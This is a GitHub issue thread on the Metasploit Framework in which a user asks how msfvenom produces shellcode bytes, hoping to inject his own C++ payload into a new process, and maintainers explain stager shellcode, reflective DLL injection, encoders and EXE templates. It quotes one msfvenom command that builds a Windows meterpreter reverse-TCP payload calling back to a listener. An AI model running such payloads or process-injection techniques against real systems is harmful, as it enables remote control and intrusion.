### ISSUE TITLE
how does msfvenom generate those assembly bytes from a c/c++ payload?

### ISSUE THREAD

**Issue by anasouardini** [rapid7/metasploit-framework#15812]
the msfvenom tool, using this command ex: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f csharp`. will generates bytes of assembly of the a payload written in C language.

i've been looking for a way to do this with my cpp payload for 7days but i found nothing about this online. i have a payload written in cpp but i want to inject it into memory and execute it in a new process.

i've compiled it into an exe and injected it using a complexe way but it caused many isues, and after solving solving those issues the app still give an error from time to time, i guess it's because injecting an exe binary is a lot difficult than i thought.

so i thought the way that msfvenom does it is easier and better. but i've stuck with it for 7 days with no result. i thought i could just write the whole payload in assembly but wfter relizing that the size of the payload reached 200kb i said no way.

again i thought that i could just copy the assembly bytes from the dissassembly window in VisualStudio, but a guy in stackoverflow told me that it's not going to work you  need to write it manually in assembly or code it in hex manually using instructions reference. i don't know what the second option means but manually is definitelly a hard-way of doing it.

but how does the msfvenom do it automatically??

**Comment by timwr** [comment]
The output from msfvenom is usually just handcrafted shellcode designed to load more shellcode over a socket. See https://github.com/stephenfewer/ReflectiveDLLInjection

**Comment by gwillcox-r7** [comment]
Marking this as resolved due to @timwr's answer above which provides a good answer of what is going on. Note that other shellcode payloads were either taken from public examples, or were crafted by team members and/or contributors. `msfvenom`, depending on the payload requested, then uses these payload bases, and uses the Metasploit Framework to load these files, plug in the IP address and port number (or similar information, this depends on the payload in question if it doesn't use an IP address and port). Once this is done, obfuscation and encoders will then be applied to the payload, along with any other optional extras, and the final payload will be output in the format specified by the `-f` flag.

Now depending on what is specified for the `-f` flag this will either be the final step, or it may then inject this into another template file, such as in the case of `-f exe` where a base EXE will be used and `msfvenom` will use Metasploit Framework code to update the base EXE so that it will run the payload generated via the aforementioned steps.

I hope that provides some more insights :) Going to close this issue for now since I think there is enough info here, but if you need more info feel free to respond with questions on what you don't get and I'll see if I can't provide additional info.
